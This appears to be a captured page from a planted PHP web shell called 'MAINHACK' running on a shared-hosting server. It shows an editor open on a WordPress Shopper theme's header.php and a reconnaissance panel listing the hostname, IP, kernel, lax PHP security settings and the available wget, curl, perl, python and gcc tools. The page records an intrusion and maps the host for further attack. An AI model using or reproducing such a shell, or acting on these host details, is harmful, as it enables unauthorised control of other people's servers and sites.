[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: header.php
<?php /** * The header for our theme * * This is the template that displays all of the <head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"> section and everything up until <div id="content"> * * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials * * @package Shopper */ ?><!DOCTYPE html> <html <?php language_attributes(); ?>> <head> "> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="http://gmpg.org/xfn/11"> <?php wp_head(); ?> </head> <body <?php body_class(); ?>> <div id="page" class="site"> <?php global $current_user; wp_get_current_user(); ?> <?php if ( is_user_logged_in() ) { echo 'Username: ' . $current_user->user_login . "\n"; echo 'User display name: ' . $current_user->display_name . "\n"; } else { wp_loginout(); } ?> <?php do_action( 'shopper_before_header' ); ?> <header id="masthead" class="site-header" role="banner" style="<?php shopper_header_styles(); ?>"> <div class="col-full"> <?php /** * Functions hooked into shopper_header action * * @hooked shopper_skip_links - 0 * @hooked shopper_social_icons - 10 * @hooked shopper_site_branding - 20 * @hooked shopper_secondary_navigation - 30 * @hooked shopper_product_search - 40 * @hooked shopper_primary_navigation_wrapper - 42 * @hooked shopper_primary_navigation - 50 * @hooked shopper_header_cart - 60 * @hooked shopper_primary_navigation_wrapper_close - 68 */ do_action( 'shopper_header' ); ?> </div> </header><!-- #masthead --> <?php /** * Functions hooked in to shopper_before_content * * @hooked shopper_header_widget_region - 10 */ do_action( 'shopper_before_content' ); ?> <div id="content" class="site-content"> <div class="col-full"> <?php /** * Functions hooked in to shopper_content_top * * @hooked woocommerce_breadcrumb - 10 */ do_action( 'shopper_content_top' );
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server05.hostinghome.co.in
Server IP: 192.168.74.40
PHP Version: 7.4.33
Server Software: Apache
System: Linux server05.hostinghome.co.in 3.10.0-962.3.2.lve1.5.81.el7.x86_64 #1 SMP Wed May 31 10:36:47 UTC 2023 x86_64
HDD Total: 1.95 TB
HDD Free: 691.97 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Disabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: itsweb
User ID (UID): 1619
Group ID (GID): 1621
Script Owner UID: 1619
Current Dir Owner: 1619